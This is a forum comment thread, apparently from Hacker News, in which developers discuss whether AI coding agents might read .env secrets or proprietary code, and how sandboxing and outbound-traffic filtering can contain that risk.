2 pointsby fnoef23 days ago6 comments
  • raw_anon_111123 days ago
    No.

    I don’t store any secrets locally. I store secrets in AWS Secrets Manager and then I get temporary access keys and set the appropriate environment variables that the AWS CLI and SDKs use automatically to retrieve them.

    I usually have three terminal windows open when I’m developing these days - one where I run code that has the environment variable set and my code reads the secrets from Secrets Manager and a terminal window running Claude Code (company reimbursed) and one running Codex using my personal ChatGPT subscription.

    In other words, AI agents don’t have access to any secrets.

    As far as personal projects, in June will be my 30th anniversary of never writing code that someone isn’t paying me for and my 34th anniversary of never writing code I wasn’t getting paid for or a degree for.

  • SERSI-S22 days ago
    I’m less worried about deliberate exfiltration and more about the structural opacity of these systems. You’re essentially being asked to trust that data boundaries are respected, without any practical way to independently verify those guarantees. Even if the current implementation is sound, the risk surface isn’t static providers, deployment paths, logging practices, and incentives all shift over time. For short-lived or organisational codebases, that trade-off can be reasonable. For personal or long-horizon projects, I’m more cautious. Once intent, context, or structure is absorbed upstream, there’s no meaningful way to claw it back.
  • 23 days ago
    undefined
  • viraptor23 days ago
    You need to run them sandboxed in some way. Docker is one kind of solution, selinux / apparmor / sandbox-exec is another. Basically, create an environment where .env is not accessible in any way and you don't have to worry about it anymore.

    I don't care about it reading the code itself. 90% of my usage is on opensource projects anyway. The other - if I can generate something, then there's no barrier to someone else doing the same - I'm just making applications that do expected things, not doing some groundbreaking research.

    • fnoef23 days ago
      It’s not only about the .env, but also intellectual property, algorithms, even product ideas.

      Moreover, let’s say you run a dev server with watch mode, and ask claude to implement a feature. Claude can generate a code that reads your .env (from within the server) and send to some third party url. The watch mode would catch it and reload the server and will run the code. By the time you catch it, it’s too late. I know it’s far fetched, and maybe the paranoia is coming from my lack of understanding these tools well, but in the end they are probabilistic token generators, that were trained on all code in open existence, including malware.

      • viraptor23 days ago
        > Claude can generate a code that reads your .env (from within the server) and send to some third party url.

        Again - sandboxes. If you either block or filter the outbound traffic, it can't send anything. Neither can the scripts LLMs create.

  • coolcat25823 days ago
    tbh im sure they do.
  • timmc7923 days ago
    [dead]